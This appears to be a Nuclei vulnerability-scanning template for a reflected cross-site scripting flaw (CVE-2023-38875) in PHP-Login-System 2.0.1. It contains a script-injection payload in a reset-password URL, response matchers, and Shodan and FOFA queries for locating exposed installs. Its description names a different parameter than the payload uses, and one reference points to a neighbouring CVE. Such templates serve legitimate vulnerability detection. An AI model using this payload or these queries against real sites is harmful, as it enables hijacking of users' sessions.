msaad1999's PHP-Login-System 2.0.1 contains a reflected cross-site scripting caused by unsanitized input in 'validator' parameter in /reset-password, letting remote attackers execute arbitrary JavaScript in a user's browser, exploit requires attacker to craft malicious URL
PoC代码[已公开]
id: CVE-2023-38875
info:
name: PHP Login System 2.0.1 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
msaad1999's PHP-Login-System 2.0.1 contains a reflected cross-site scripting caused by unsanitized input in 'validator' parameter in /reset-password, letting remote attackers execute arbitrary JavaScript in a user's browser, exploit requires attacker to craft malicious URL
impact: |
Attackers can execute arbitrary JavaScript in users' browsers, potentially stealing cookies or session tokens.
remediation: |
Implement proper input validation and output encoding for the 'validator' parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-38876
- https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38875
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38875
cwe-id: CWE-79
epss-score: 0.04107
epss-percentile: 0.88213
cpe: cpe:2.3:a:msaad1999:php-login-system:2.0.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: msaad1999
product: php-login-system
shodan-query: http.html:"klik_loginsystem"
fofa-query: body="klik_loginsystem"
tags: cves,cve2023,xss,php-login-system
http:
- method: GET
path:
- '{{BaseURL}}/reset-password/?selector=test"><script>alert(document.domain)</script>&validator=test'
matchers:
- type: dsl
dsl:
- 'contains_all(body, "test\"><script>alert(document.domain)</script>", "Embeddable PHP Login System")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201fb9b9cdbda97e921b0c51bfc25582f9653966866abe4a1960b6d873da90354802205fc1f901675f1057b8d21f475b3f355e832d6af43429f01b791f0c3072348dbc:922c64590222798bb761d5b6d8e72950